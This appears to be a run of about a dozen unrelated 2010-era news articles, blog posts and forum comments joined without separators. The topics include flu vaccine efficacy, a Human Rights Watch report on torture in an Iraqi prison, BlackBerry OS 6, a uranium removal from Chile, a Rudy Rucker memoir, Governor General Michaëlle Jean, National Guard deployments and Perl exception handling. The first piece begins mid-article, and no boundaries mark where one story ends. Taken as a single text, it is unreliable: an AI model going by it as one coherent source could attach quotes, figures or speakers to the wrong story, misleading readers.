" You know if everybody says that the sky is blue , the sky is blue and then you get a paper submitted that says the sky is green , people are a little bit more , they question more and they 're a little bit more reluctant , " said Kris Ehresmann , who directs the Infectious Disease Epidemiology , Prevention and Control Division at the Minnesota Health Department .
Ehresmann said Jackson 's data is good data but it makes her job harder .
" I welcome the data as a scientist , " Ehresmann said .
" But as someone that also does communication and public messaging , that 's the part that does n't welcome it as much , just simply because it makes it more complicated for trying to convey things to the public . "
Ehresmann is worried that if the data are publicized , people will think there is no reason to get a flu vaccination .
She says there is strong research showing that flu vaccines are very effective among younger people .
And for those over age 65 , she says the vaccine likely has some effect at preventing flu - especially among healthier older people .
Dr. Ed Belangia with the Marshfield Clinic in Marshfield , Wisconsin agrees .
He studied vaccine effectiveness in the elderly and in children .
While his research reported widely varying results , ranging from 10 percent effectiveness to just over 50 percent during a three - year period , he says it 's clear that the flu vaccine is better than nothing .
" None of us are saying that the current vaccine is no good or does n't work , " Belangia .
" It 's just that it does n't appear to work as well as we thought and we need to look at how we can improve it . "
That 's also the message that Osterholm took to a national gathering of vaccine researchers in Bethesda , Maryland .
" The bottom line message is we need new and better vaccines that are going to work more effectively in the elderly , " Osterholm said .
Osterholm said there is promising work already underway to identify a new type of flu vaccine .
He 's part of a group of researchers looking at what it will take to make the vaccine a reality .
In the meantime , a new high potency flu vaccine has been approved for people over age 65 .
It 's essentially a double dose of the regular vaccine .
It will be available this fall .
( Baghdad ) - Detainees in a secret Baghdad detention facility were hung upside - down , deprived of air , kicked , whipped , beaten , given electric shocks , and sodomized , Human Rights Watch said today .
Iraq should thoroughly investigate and prosecute all government and security officials responsible , Human Rights Watch said .
Human Rights Watch interviewed 42 of the men in the Al Rusafa Detention Center on April 26 , 2010 .
They were among about 300 detainees transferred from the secret facility in the old Muthanna airport in West Baghdad to Al Rusafa into a special block of 19 cage - type cells over the past several weeks , after the existence of the secret prison was revealed .
The men's stories were credible and consistent .
Most of the 300 displayed fresh scars and injuries they said were a result of routine and systematic torture they had experienced at the hands of interrogators at Muthanna .
All were accused of aiding and abetting terrorism , and many said they were forced to sign false confessions .
" The horror we found suggests torture was the norm in Muthanna , " said Joe Stork , deputy Middle East director at Human Rights Watch .
" The government needs to prosecute all of those responsible for this systematic brutality . "
The Iraqi authorities should establish an independent and impartial inquiry to investigate what happened at Muthanna , determine who was responsible , and prosecute them , Human Rights Watch said , including anyone in authority who failed to prevent the torture .
The government also needs to ensure that courts will not admit any confessions obtained through torture .
The men interviewed said the Iraqi army detained them between September and December 2009 after sweeps in and around Mosul , a stronghold of Sunni Arab militants , including Al Qaeda in Mesopotamia .
They said torture was most intense during their first week at Muthanna .
Several well - informed sources told Human Rights
Watch that this secret facility was under the jurisdiction of Prime Minister Nuri al - Maliki 's military office .
All the detainees interviewed described the same methods of torture employed by their Iraqi interrogators .
The jailers suspended the detainees handcuffed and blindfolded upside down by means of two bars , one placed behind their calves and the other against their shins .
All had terrible scabs and bruising on their legs .
The interrogators then kicked , whipped and beat the detainees .
Interrogators also placed a dirty plastic bag over the detainee 's head to close off his air supply .
Typically , when the detainee passed out from this ordeal , his interrogators awakened him with electric shocks to his genitals or other parts of his body .
During the interrogations , security officials mocked the detainees and called them " terrorists " and " Ba'athists . "
To stop the torture , detainees said , they either offered fake confessions or signed or fingerprinted a prepared confession without having read it .
Even after they confessed , many said , torture persisted .
The detainees told Human Rights Watch of other torture methods as well .
They described how interrogators and security officials sodomized some detainees with broomsticks and pistol barrels and , the detainees said , raped younger detainees , who were then sent to a different detention site .
Some young men said they had been forced to perform oral sex on interrogators and guards .
Interrogators also forced some detainees to molest one another .
Security officials whipped detainees with heavy cables , pulled out fingernails and toenails , burned them with acid and cigarettes , and smashed their teeth .
If detainees still refused to confess , interrogators would threaten to rape their wives , mothers , sisters , or daughters .
The interrogation sessions usually lasted three or four hours and occurred every three or four days .
Muthanna held more than 430 prisoners before their transfer to other detention facilities earlier this month .
For months , nobody knew their whereabouts .
Detainees had no access to their families or legal counsel .
They were not issued any official documents or even a detainee or case number .
An investigative judge heard cases in a room down the hall from one of the torture chambers in the facility , they said .
After the Los Angeles Times first reported the abuse at the Muthanna detention facility on April 19 , the Iraqi government said it would investigate the torture claims and has arrested three army officers in connection with the abuse .
" What happened at Muthanna is an example of the horrendous abuse Iraqi leaders say they want to leave behind , " Stork said .
" Everyone responsible , from the top on down , needs to be held accountable . "
The following are excerpts from the detainees ' testimony :
WooHOO !!
A first REAL look at BlackBerry OS 6.0 .
The Boy Genius got some screen captures and a tour of the updated and evolving OS 6.0 from an AT&T connect and has reported back with lots of details .
Things are looking very promising for us BlackBerry users who have been waiting patiently ( err... impatiently ) for both a first real glimpse at OS 6.0 and for its ultimate release .
Here are some of the key details :
As expected , it 's an evolution of the existing BlackBerry OS
RIM has implemented kinetic scrolling with rubber banding throughout the OS ( more fluid experience )
RIM has implemented multitouch throughout the OS - web browser , photos ( including pinch to zoom ! )
Re-vamped inbox - w/ large thumbnails to identify the type of message ( facebook , twitter , etc. ) and features built - in RSS .
BG is loving the experience here ...
Homescreen changeup :
No widget support , but RIM has implemented something called Pages .
BG 's explanation : " You can have your applications on the main page , then slide left or right to another page with different applications and browse that way .
In the homescreen screenshot above , you 'll see a sliding field towards the bottom , and you can slide that up , and reveal the first page of applications , and you can then slide that to show the different groups which correspond to the different homescreen page .
Favorites , all , home , etc . "
On touchscreen device , new modal popup with gestures - tap and hold , pops up an icon set ( menu ) with context menu items ( read full explanation at BGR ) .
Updated media player , photos app and of course the WebKit browser !!
All around this is looking like a GREAT update to the BlackBerry operating system .
The word is we 'll see OS 6.0 launch on a device in June / July ( we 're hoping this is true ) .
There are MORE DETAILS and MORE IMAGES over at BGR , so click on over at the link below to jump over and get your 6.0 on !
Source : BGR
From : outpunk
2010-04-19 09:21 pm ( UTC )
Again I say : AMAZING SONG !
and keep up the good work !
From : dima_dig
2010-04-19 09:51 pm ( UTC )
already , already .. :)
From : zloy_alex
2010 -04-19 10:15 pm ( UTC )
Thank you From : starla_whir
2010-04-19 11:18 pm ( UTC )
;-) Ooooooooooooow Hawkwindish ... gotta luv the guitar sounds & again your voice sends me to that place .
You 're a PURE MEASTRO Sir Billy ... until the neXt one
Peace & Love From : ( Anonymous )
2010 -04-20 01:33 am ( UTC )
billy even though i am not a boy you are the person i listen to when i have some problems .
even thought i am only not even 13 i still want you to know how much you impact my life you are what i need i love your music .
you are my idol i look to and hope you can come here for a concert i would so be there !!!!!
From : tzar_vasilich
2010 -04-20 05:12 am ( UTC )
Thanks ,
Billy !
From : rooktv
2010 -04-20 06:35 am ( UTC )
MELISSA AUF DER MAUR will be at our gallery this weekend MELISSA AUF DER MAUR , celebrating her recent Out of Our Minds album / film / comic book .
Come to CAD ( CHICAGO ART DEPARTMENT ) to see Melissa 's photography , filmmaking , comic art , and hear her music .
Friday April 23rd , 2010 | 6:00 to 10:00 p.m. Chicago Art Department - 1837 South Halsted From : ext_232112
2010 -04 -20 09:03 am ( UTC )
Thank you Thank you not only for the wonderful music , but for being one of few musicians who are willing to work with the Internet rather than against it .
I hope that other artists will follow your fine example and seriously consider new models for distributing music .
I have already pre-ordered the first EP , and am looking forward its arrival .
Keep up the good work !
From : ( Anonymous )
2010 -04-25 07:41 am ( UTC )
Re : Thank you Hey Corgan !
I 'm currently checking out your older stuff .
I like a few of the classics , but I love the way you went with Zeitgeist .
The whole album was well done and I really like the grunge sound .
I hope the new album is similar .
Ca n't wait !
From : ( Anonymous )
2010-04-26 01:58 pm ( UTC )
TO THE SMASHING PUMPKINS Dear W.P.C .
I drew the most original artwork of all time , and it includes you .
I hope you enjoy it :
http://www.facebook.com/album.php?aid=3461&id=1285596002&l=973c46e34c
- A.M.-
The world may have narrowly averted a serious nuclear accident in February when US scientists managed to get a deposit of enriched uranium out of Chile in the midst of a massive earthquake , MSNBC ’s Rachel Maddow told viewers Tuesday night .
Maddow reported on revelations in a Time magazine article that US officials were secretly engaged in removing from the country 40 pounds of enriched uranium — the material needed for nuclear weapons and nuclear power generation — when the 8.8 - magnitude quake struck .
ADVERTISEMENT
The earthquake occurred barely 12 hours after US and Chilean scientists had secured the uranium in special containers lined with eight inches of lead and steel .
Had the uranium been unsecured at the time of the quake , there would have been a real risk of a nuclear incident .
Forty pounds of uranium is enough to take “ part of a large city , ” Maddow reported .
With the quake having destroyed the port where the uranium would be loaded onto two US ships , the scientists scrambled overnight to find an alternative route to get the uranium out of Chile , finally settling on another port , 50 miles away from the original .
The scientists moved the uranium in a “ dark - of - night convoy through ravaged countryside with no electricity , ” Maddow reported .
At the port , another close call ensued when one of the cranes loading the uranium onto a US ship malfunctioned and sent the uranium swinging overhead , before it was brought under control .
Maddow reported that the uranium — which reportedly was being used as part of Chile ’s nuclear energy program — ended up in South Carolina , where it was processed into less dangerous nuclear fuel .
“ Much of the uranium around the world is very loosely guarded , and that is an enormous threat , ” reporter Ron Suskind told Maddow .
“ That is why the Obama administration has stepped up , and to be sure they ’ve gone beyond the Bush administration quite dramatically . ”
ADVERTISEMENT
President Obama hosts the heads of 47 countries in Washington this week for a nuclear security summit , the largest gathering of world leaders on US soil in more than half a century .
Ahead of that conference , Ukraine announced it would be getting rid of its stockpile of enriched uranium , left over from when the country hosted Soviet nuclear weapons .
“ Forty - seven nations coming to the US saying we need to solve this problem — that is an enormous step forward , ” Suskind said .
Maddow noted that last year Obama announced a goal of securing the world ’s loose nuclear materials within four years .
ADVERTISEMENT
“ Everybody thought that health reform was going to be President Obama ’s lasting presidential legacy , ” Maddow said .
“ Health reform , I ’d like to introduce you to your very dramatic international match . ”
This video is from MSNBC’s The Rachel Maddow Show , broadcast April 12 , 2010 .
ADVERTISEMENT
Please turn on JavaScript .
Media requires JavaScript to play .
A tiny Japanese insect that could help the fight against an aggressive superweed has been given the go - ahead for a trial release in England .
Since Japanese knotweed was introduced to the UK it has rapidly spread , and the plant currently costs more than £ 150 m a year to control and clear .
But scientists say a natural predator in the weed 's native home of Japan could also help to control it here .
Dr Dick Shaw from Cabi , a not - for - profit agricultural research organisation , explains how the bug - called a psyllid - attacks knotweed .
[ Back to memoir excerpts .
Somehow the Sixties feel very close today ! ]
In the late 1960s and early 1970s , I was at Rutgers Univeristy learning math .
For the first time in my life , I was taking courses that I found difficult in an interesting way : abstract algebra , real analysis , topology , and mathematical logic .
And , for the first time since high school , I was attending all the class lectures and doing the homework .
[ Boyhood suitcase of magic tricks . ]
My wife , Sylvia , was finishing her Master ’s degree in French literature .
I liked hearing about the wild books she had to read , like medieval plays featuring Eve and Satan , or the poems of Apollinaire .
In the evenings , she and I would do homework together in our little living room .
It was cozy .
The Rutgers math department was giving me some financial support as a teaching assistant , and I met twice a week with a section of calculus students to show them how to do their homework problems — they got their lectures from a professor in a big hall .
Working through the problems on the board , I finally began to understand calculus myself .
It made a lot more sense than I ’d realized before .
I was undergoing a constant cascade of mathematical revelation , even coming to understand such simple things as why we need zeroes , or why “ borrowing ” works when you ’re doing subtraction .
I was learning a new language , and everything was coming into focus .
The mathematical logic course was a particular revelation for me .
I liked the notion of mathematics being a formal system of axioms that we made deductions from .
And I reveled in the hieroglyphic conciseness of symbolic logic .
From the academic point of view , I was beginning to see everything as a mathematical pattern .
But in my personal life , everything was love .
Sylvia and I were enjoying the Sixties — we went to the big march on the Pentagon , we had psychedelic posters on our walls , we wore buffalo hide sandals , and we read Zap Comix .
I smoked pot rolled in paper flavored like strawberries or wheat straw or bananas .
Sylvia bought herself a sewing - machine and started making herself cool dresses .
At the same time , the war in Vietnam was casting a bitter pall .
Those who did n’t live through those times tend not to understand how strongly the males of my generation were radicalized against the United States government .
Our rulers wanted to send us off to die , and they called us cowards if we would n’t go .
It broke my heart to see less - fortunate guys my age being slaughtered .
My hair was shoulder - length by now , and occasionally strangers would scream at me from cars .
We were friends with a wild math grad student named Jim Carrig , from an Irish family in the Bronx .
Jim and his wife , Fran , were huge Rolling Stones fans — they were always talking about the Stones and playing their records .
They ’d sign up early to get a shot at the tickets to the touring Stones shows .
Thanks to them we saw the Stones play a wonderful afternoon show at Madison Square Garden .
“ Did y’all get off school today ? ” asked Mick , strutting back and forth .
“ We did too . ”
And then they played “ Midnight Rambler ” and he whipped the stage with his belt — a trick we took to emulating at parties .
The Carrigs threw great Halloween parties .
They lived an apartment on the second floor of a house , and Jim would stand at the head of the stairs like a bouncer , checking up on his guests ’ attire .
“ Get the f*ck outta here ! ” he ’d yell if anyone showed up without a costume .
“ Go on , we do n’t wanna see you ! ”
I came to one party as a Non-Fascist Pig .
That is , I bought some actual pig ears at the supermarket , punched holes in them , threaded a piece of string through them , and tied them onto my head .
I lettered , “ F*ck Nixon , ” onto my T - shirt .
I pinned on a five - pointed Lunchmeat Award of Excellence star that I ’d cut from a slice of Lebanon bologna .
And I carried a pig - trotter in my pocket to hold out if anyone wanted to shake hands with me .
When Sylvia and I went to see the left - wing movie Joe , the movie theater played the Star Spangled Banner before the film , and there was nearly a fight when a guy two rows ahead of us would n’t stand up .
Turned out the guy was a Viet vet himself .
“ That ’s why I went to fight , ” the vet told the older man harassing him .
“ To keep this a free country .
I do n’t have to stand up for no goddamn song . ”
I was very nearly drafted , undergoing a physical that classified me 1A .
I ’d thought that my missing spleen would earn me a medical exemption , but no dice .
I still remember the medical officer who told me the bad news .
Sidney W… oh , never mind his full name .
He seemed to have a chip on his shoulder .
Maybe he ’d been drafted himself .
I bought some time by faking an asthma attack — and then they switched to a lottery number system for the draft , and I happened to get a comfortably low number .
I was n’t going to Vietnam after all .
I was going to keep on learning math , being a newlywed , and having fun .
The tidal wave of underground comix inspired me to get some Rapidograph pens and to start drawing comics on my own .
I developed a wacky , left - wing strip called Wheelie Willie that occasionally appeared in the Rutgers campus newspaper , the Targum .
I felt uneasy about my ability to draw arms and legs , so my character Wheelie Willie had a snake - like body that ended in a bicycle wheel .
Some of the students must have liked the strip , as a fraternity once went so far as to have a Wheelie Willie party , not that I attended it .
Another close friend was my fellow math grad student Dave H .
He was a skinny guy with an odd way of talking — he almost seemed like an old man .
He always said “ Rug- ters ” instead of “ Rutgers , ” and “ pregg - a - nit ” instead of “ pregnant . ”
When Dave arrived for our grad student orientation session , he told me that he ’d demonstrated against all three of the current presidential candidates : Humphrey , Nixon , and Wallace .
And he ’d been arrested in the Chicago convention riots .
He was always going off to marches and demonstrations .
Once he even roped Sylvia and me into making a trip to give support to the AWOL soldiers in the brig at Fort Dix .
The soldiers gave us the finger .
OTTAWA–In a ballroom full of people milling , hovering , waiting to speak to her , Governor General Michaëlle Jean is a pro .
She shakes hands warmly , beams her megawatt smile , her eyes sparkling , as she answers the same questions , over and over .
It is shortly after she popped a piece of raw seal heart into her mouth on a visit to Canada 's Arctic last May .
Nearly everyone in the roomful of journalists attending the Michener Awards wants to know , what was it like ?
How did it taste ?
Was her controversial gesture planned , or spontaneous ?
Any regrets in the ensuing uproar ?
Each and every time she tells the story , it seems fresh , as if she were thinking her way through it anew .
She gestures how it was offered , how she accepted , how she sniffed her fingertips afterward , like the Inuit elder .
She never misses a beat .
It 's a performance skill perfected by public speakers , politicians and television broadcasters – as Jean once was .
Much of the vice - regal job is performance .
But Jean , the Haitian - born , Quebec - raised Radio - Canada broadcaster , brought more to the post than the ability to glad - hand her way across a room .
At least , that 's the way most Canadians see it .
She undertook an agenda to promote Canada 's youth , the arts , the North , and – as a daughter of an abused woman – to speak out against violence against women .
She proudly embraced the role of commander - in - chief of the Canadian Forces , lavishing medals on members , attending funerals , ditching a dress coat and stilettos for military dress and medals at last year 's Remembrance Day ceremony in the presence of Prince Charles and his wife , Camilla , the Duchess of Cornwall .
Jean made Canadians proud when she welcomed newly inaugurated U.S. President Barack Obama on his first international visit .
She recalled his words when the two commanders - in - chief of African descent met at the airport : " Let us rejoice , " Obama said , she told the CBC last year .
" We connected instantly . "
She has embarked on visits around the globe to Haiti , to Slovenia , Croatia , Greece , Czech Republic , Mexico , Guatemala and Costa Rica , Brazil , Hungary , Ukraine , Norway , Algeria , Mali , Ghana , South Africa and Morocco .
This week , she attended the Haitian donors conference at the United Nations as an observer .
Since being appointed by then - prime minister Paul Martin in 2005 , her duties have included being the constitutional arbiter of three minority governments – Martin 's short - lived Liberal regime , and two subsequent Conservative administrations led by Prime Minister Stephen Harper .
She kept Harper dangling for a couple of hours in December 2008 before acceding to his request to prorogue a Parliament that had lost confidence in him rather than granting his rivals a shot at governing through a coalition .
It was a turning point for Harper , who , sources say , thought his request should have been " a routine matter . "
Jean told the CBC interviewer last summer " it was n't an easy decision .
The Prime Minister came with his advice , I consulted also " with constitutional experts .
She " could have said no , " she added .
" My main focus was what would be the best decision in the best interests of the country ... and I have no regrets . "
No matter what Harper thinks , in the eyes of most Canadians , Jean has performed with grace .
An Angus Reid poll conducted for the Star shows that 57 per cent of Canadians surveyed approve of the way she has handled her duties , while just 26 per cent disapprove .
That 's the kind of approval numbers Harper – or any of his political opponents – can only dream of .
Still , Harper has decided not to extend Jean 's term and is actively seeking her replacement , the Star has learned .
Harper may welcome the poll 's finding that Canadians are split on whether Jean 's term should be extended for an additional two years , with 43 per cent in favour and 40 per cent opposed .
The same poll found that 50 per cent of those surveyed would approve of Rick Hansen in the post .
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
Loading ...
But Hansen , who has turned down the job , is intent on raising funds for spinal cord injury research – his life 's work since he embarked on the worldwide Man in Motion tour 25 years ago .
All of which leaves Harper searching for someone as popular as either Jean or Hansen , who would also be committed to an often thankless – and in the eyes of this Prime Minister – largely ceremonial role .
Outwardly , Harper and Jean appear to get along .
Some who have observed them together describe the relationship as " warm . "
" The dynamic is the normal dynamic that has always been observed between a prime minister and a governor general .
Respectful , " says one observer .
The significant marker of Jean 's tenure is that she has held office during minority governments , which prompts one source to say : " It 's a good relationship with its challenges . "
The relationship has evolved over time .
One Conservative says Harper was not inclined to like " where she came from , i.e. , who appointed her . "
But the Prime Minister is also said to have found her charming .
Still , irritants have arisen .
Some cite " the way she does the job , " suggesting she focuses too much on her own projects , the latest all - consuming one being aid to Haiti in the earthquake 's aftermath .
Other Conservatives like Newfoundland Premier Danny Williams are impressed by Jean 's passion on Haiti .
Williams offered a $ 1 million donation from his province , moved by her anguish .
So just what is Stephen Harper looking for in a governor general ?
" The Prime Minister believes it should be an end - of - career posting , " said one source , so that a governor general would not go on to an " awkward post vice - regal career . "
Look at the appointments to nine of the 10 lieutenant - governor positions Harper has filled across the country , the source suggests .
The appointments have been largely senior public servants at the end of their careers , some with experience as legislative clerks or as assistant deputy ministers , familiar with how government works .
" Except for John Crosbie , they have not been political people , " the source said .
The source added that while the decision - making process has not advanced very far , John de Chastelain , twice a chief of defence staff in the past , and a former ambassador to the United States , is " a strong default " candidate .
Inuit leader Mary Simon appears not to be in consideration , despite the rumour mill .
" One thing is for sure , it definitely wo n't be a CBC broadcaster , " the source says , referring not only to Jean but her predecessor Adrienne Clarkson .
Read more about :
If George W. Bush – notorious for skipping his Texas Air National Guard drills during the Vietnam War – were in the Guard today , he ’d be up in the air without a propeller .
That ’s because today ’s National Guard has become virtually indistinguishable from the nation ’s active - duty forces in the war zone .
The majority of these so - called part - time soldiers have served combat duty in Iraq and Afghanistan , with many – if not most – deployed more than once .
As of April 24 , 622 members of the Guard have been killed [ . pdf ] in the two - front war since 2001 .
Forget the whole bit about “ weekend warriors ” – reservists have become indispensable to the ongoing overseas operations since Bush himself launched the country into war nine years ago .
But activists in several states are saying that the founding fathers did not envision the state “ militias ” being used in foreign invasions and occupations , especially those against enemies that do not pose an imminent threat to the continental United States .
Plus , the constant redeployment of the Guard has left local first - responders such as fire and police departments struggling to fill staff , families under mental and financial strain , and domestic emergency response capability increasingly at risk .
This is not to mention the psychological toll on the soldiers themselves .
It has been estimated that more than half of veteran suicides – 53 percent – are among National Guard members returning home from war .
That ’s why citizens are demanding – more than ever – “ Bring ‘ em home ! ”
“ Certainly , these deployments are not what members of the National Guard signed up for – it was not what they were advertising in recruiting [ these soldiers ] , it ’s not the mission of the National Guard , which should be homeland defense , ” insists Ben Manski , a Wisconsin attorney who serves as the executive director of the Liberty Tree and works with the Bring the Guard Home project .
Activists in states such as Wisconsin , Vermont , Oregon , Idaho , Maryland , New Hampshire , Rhode Island , and New Mexico have been pushing legislation telling their governors to review – and stop – the orders sending the National Guard into Iraq .
While the language varies , the proposals all suggest that the mission in Iraq no longer corresponds to the initial 2002 congressional Authorization for the Use of Military Force ( AUMF ) [ .pdf ] against now - dead Iraqi dictator Saddam Hussein , and therefore the continued use of the Guard is inappropriate and perhaps even unconstitutional .
“ The Guard is being sent overseas without an authorization from Congress , ” says Vermont state representative Mike Fisher , who managed to get 77 of his fellow legislators – more than half of the House membership – on board for a bill that would require the state attorney general to review and explain the state ’s plan to deploy – or not deploy – its National Guard in light of what the bill [ . pdf ] calls a lack of federal authority to do so .
Unfortunately for Fisher , the bill was stopped dead by the leadership of the General , Housing , and Military Affairs Committee in the last session .
“ Having the states step into issues of the appropriateness of sending troops into battle is an unusual place for states to be , ” admits Fisher , noting the hesitancy by some of his colleagues to get involved , despite Vermont ’s reputation as a liberal , antiwar state .
“ There is a concern by some that we do n’t want to send the wrong message [ to the troops ] .
I personally think it ’s absolutely the right message , saying , ‘ We have your backs , and we only want to send you into the conflict when the military is clearly authorized . ' ”
Oregon activists had been similarly successful with their own house bill , until it was thwarted before the end of last year ’s legislative session and the spring deployment of 2,700 fresh Oregon National Guard troops to Afghanistan .
“ What happened there is the leadership was unwilling to follow through with its commitment to the movement , ” says Manski .
“ They are gearing up for the next session .
A lot of groundwork has been laid , and the state party leaders have been given time to let democracy work , and now there is increasing frustration .
We know what happens if Congress does n’t follow through – there ’s not much by way of accountability – but we have to see if we can put some accountability into play at the state level . ”
As of three years ago , 417,000 , or about 80 percent , of the nation ’s National Guard members had already been overseas to Iraq or Afghanistan .
About 20 percent of those had already been more than once .
At the time those statistics were culled , there was much talk about active - duty and reserve forces being severely strained , if not at a breaking point .
Pennsylvania Gov. Ed Rendell , in an appearance on Meet the Press last year , said more than 85 percent of his Guard had been overseas , some three or four times , and that they were “ wasted ” as a result .
The number of Guard and reserves as a percentage of the total force in Iraq and Afghanistan has fluctuated over the years .
Official estimates in 2005 were at 28 percent ; it was about 7 percent in Iraq and 15 percent in Afghanistan at the end of 2008 .
Manski estimates it ’s closer to one - third today .
And new deployments are announced seemingly every day .
Despite plenty of talk of dramatically increasing the overall force , the Army is around the same size as it was at the beginning of the war – if not shrinking .
And while the Army and reserves say they are exceeding recruitment projections , critics have wondered openly what kind of shell game – like reducing end - year goals – officials might be playing to keep up appearances .
Said Slate ’s Fred Kaplan in January :
“ So here is the situation .
The secretary of defense ordered , and Congress authorized , an expansion in the size of the Army .
But the Army reduced the recruitment goal – and reduced the retention goal .
The size of the Army is in fact shrinking .
It may look as if it ’s growing – the Pentagon report gives the impression it ’s growing – but it ’s growing only in comparison with the officially set goals . ”
So , however one reads this , do n’t expect a letup on Guard deployments any time soon .
For the so - called part - time warriors , this has been an incredible strain on their personal and professional lives .
While federal law ensures they will have their regular jobs when they get back , they often face a cut in pay while on active duty and do n’t have the same centralized support network as the active - duty military .
“ They are not able to plan for the future .
They had careers , maybe they were in school .
Then it got interrupted , ” says Manski of the younger soldiers on repeat deployments .
“ It ’s proven very disruptive to have the Pentagon use the National Guard in this way , where they are so dependent on the Guard for the occupation of Iraq and Afghanistan . ”
But it is illegal ?
Depends on whom you ask .
While the U.S. Constitution ( Article 1 , Section 8 ) says Congress has the power to call up the state “ militia ” ( the progenitor of today ’s Guard ) to “ execute the Laws of the Union , suppress Insurrections and repel Invasions , ” the role of the militia has been further defined and guided by numerous laws and amendments over the last 100 years .
The modern National Guard was born with the Dick Act in 1903 , and a later amendment allowed the president to send Guard units overseas for duty .
In a series of acts from 1916 to 1933 , the National Guard eventually became a regular component of the Army that would be under the control of the state and the federal government , which retained the authority to federalize the Guard in times of emergency .
In 1952 , the Armed Forces Reserve Act allowed for the call - up of the Guard , including overseas training , without an emergency , but not without the consent of the governors impacted by the order .
In 1986 , the Montgomery Amendment partially rescinded the consent requirement , charging that governors could not object to the federal deployment of their Guard troops over the “ location , purpose , type , or schedule of [ federal ] duty . ”
The Supreme Court affirmed this in Perpich v. Department of Defense , saying in that case that governors cannot object to the training of troops overseas under federal orders .
Experts like David Rittgers , a judge advocate general reserve officer and veteran who did three tours in Afghanistan , says in reference to the state efforts to stop the deployment of Guard troops to war , “ Governors do n’t have the power to override the president in this matter . ”
He adds that this opinion is his own , and not necessarily that of the U.S. military .
Rittgers is currently a legal analyst for the Cato Institute .
“ After the Perpich decision , it is hard to see a court saying that the troops must come home , ” he says , noting that since 1933 the law has recognized the Guard as having “ dual enlistment , ” in that soldiers serve as part of both the federal Army and the state militia , with prevailing authority given to the federal government to call up its reserves for both active duty and active - duty training .
Governors , says Rittgers , cannot object based on the type and purpose of the specified duty , which is what it seems the activists currently want to do .
Others obviously disagree , noting that in the Perpich decision , the justices did not close the door on a gubernatorial veto .
In fact , the court said that “ governors may withhold their consent on other grounds . ”
Attorney Benson Scotch , in a legal memo for the Wisconsin backers of proposed state legislation questioning the continued use of National Guard soldiers for federal duty in Iraq , claims that , based on the orders that federalized the reserves in the first place , “ there is no authority under the Constitution or the laws of the United States for the continued presence of National Guard members in Iraq , and indeed no authority for the use of force at all in Iraq . ”
He argues that both Congress and the president share warmaking powers in the Constitution and that the 1973 War Powers Act , the authority of which remains disputed to this day , recognizes the role of Congress in mobilizing federal troops for war .
In fact , it was such an authorization , passed by Congress and signed by President Bush in October 2002 , that allowed Bush to send Guard troops into Iraq “ to enforce all relevant United Nations Security Council resolutions regarding Iraq ” and to “ defend the national security of the United States against the continuing threat posed by Iraq . ”
That 2002 AUMF is now moot , argues Scotch , because Saddam is dead and the search for the so - called weapons of mass destruction that were the basis of the UN resolutions has long been aborted .
These facts form the basis the state ’s legal argument .
Scotch admits that “ courts have usually declined to hear war powers cases – cases challenging the exercise of war powers , typically the initiation of the use of military force . ”
However , that does not mean the states should knuckle under .
Scotch :
“ But the reluctance of courts to accept jurisdiction of war powers cases at the present time cannot be cited as grounds for states to willingly comply with invalid federalization orders .
If A 203 [ the Wisconsin bill ] is adopted and appropriately applied , there may come a time when a federal agency seeks judicial assistance in compelling state compliance .
“ Win or lose in such an event , the issue of accountability in the exercise of war powers would be brought more clearly into the public square .
It would be useful to know if Congress can impose enforceable conditions in an Authorization for Use of Military Force , and if so , what the path to enforcement might be . ”
Fisher says there is a similar case to be made against the Guard ’s involvement in Afghanistan , too , noting that the 2001 AUMF against the 9/11 terrorists is too broad , and must be examined for its legitimacy as well .
“ While I am going to be persistent in getting [ our bills ] passed somewhere , my real goal is to keep getting this discussed .
Whether you believe it is wrong or evil or necessary , when America decides to go to war , we ’re all better off when it gets done within a legal process .
This is really about the next war – and there will be a ‘ next war . ' ”
Manski acknowledges that “ it would be hard to turn back the clock to 1902 , ” before state militias became an appendage of the federal government , but states should still exert what prerogatives they do have , and perhaps help to bring U.S. foreign policy closer to what the founders envisioned , “ that this be a nation of liberty , not empire . ”
BP PLC , facing rising public anger in the U.S. , began Monday its third attempt to contain oil from its leaking well in the Gulf of Mexico , but the risky operation could make the spill worse in the short term .
The latest procedure involves slicing off the leaking pipe at the top of the well 's broken blow - out preventer , placing a cap over the leak and channeling the captured oil and gas to a vessel on the surface .
BP officials said the procedure could take from four days to a week , and it already has two different caps on the ...
Exception handling in Perl 5 seems easy , until you realize all of the things that could possibly go wrong between the time your eval BLOCK exits and you check the global variable $ @ .
Fortunately , Try :: Tiny hides most of the difficult details from you , so you can concentrate on writing good exception handlers without worrying about all of the special cases that may eventually confuse and concern you .
It was inevitable to see a suggestion to put Try : : Tiny in the core , and the resulting discussion of conflicting goals and motivations and reasons to remove things from the core and suggestions of other things to put in the core was even more inevitable .
( If you 've read one thread like this before , you 've read one too many . )
Yuval Kogman , the author of Try :: Tiny responded the other day , saying that Try : : Tiny is a band - aid , not a solution .
Here 's a design principle .
Exception handling in Perl 5 is difficult to use with complete safety and correctness .
You have to beware of a few strange edge conditions that , in most software , never occur .
When they do occur , they 're strange and difficult because of the semantics of how scopes and exceptions and destruction and call - graph unwinding occur in Perl 5 .
Making Try :: Tiny a core module — and recommending it as the core - approved way of handling exceptions in Perl 5 — enshrines that workaround as well as the flaws of implementation around which it works .
The module exists as an alternative to a proper fix at the language and implementation levels .
It 's a patch .
It 's a workaround .
It 's not a controversial extension to the language that some people may want and others do n't .
Instead , it 's a makeshift that offers more safety and correctness and abstractions around those relatively unknown idioms to help people write better programs .
In the same way , signatures is a workaround for the lack of a feature in Perl 5 as much as MooseX : : Declare is a workaround for the lack of succinct boilerplate - reducing features in Perl 5 .
Making extensions possible does n't relieve language designers and implementors from the responsibility of providing necessary features and abstractions .
Devel :: Declare is , in general , a good thing because it allows experimentation with language features and ideas that may be useful in the core eventually , or may be useful in specific domains , or may be unsuccessful , but at least provide that data .
Safety and ease of experimentation help develop communities of invention and evolution .
... but you have to recognize workarounds for what they are .
Next time , I 'll explain the practical consequences of this tension .
A lot of people are comparing this beautiful treehouse in Portland , Oregon to a hobbit dwelling .
Personally , add a little black paint and it looks like something Darth Vader would retreat to when things get a little to hectic on the Death Star .
It also looks like it would double as a swanky TIE fighter .
From the architect ,
Located on a flag lot , a steep sloping grade provided the opportunity to bring the main level of the house into the tree canopy to evoke the feeling of being in a tree house .
A lover of music , the client wanted a house that not only became part of the natural landscape but also addressed the flow of music .
This house evades the mechanics of the camera ; it is difficult to capture the way the interior space flows seamlessly through to the exterior .
One must actually stroll through the house to grasp its complexities and its connection to the exterior .
One example is a natural wood ceiling , floating on curved laminated wood beams , passing through a generous glass wall which wraps around the main living room .
Check out some more pics here .
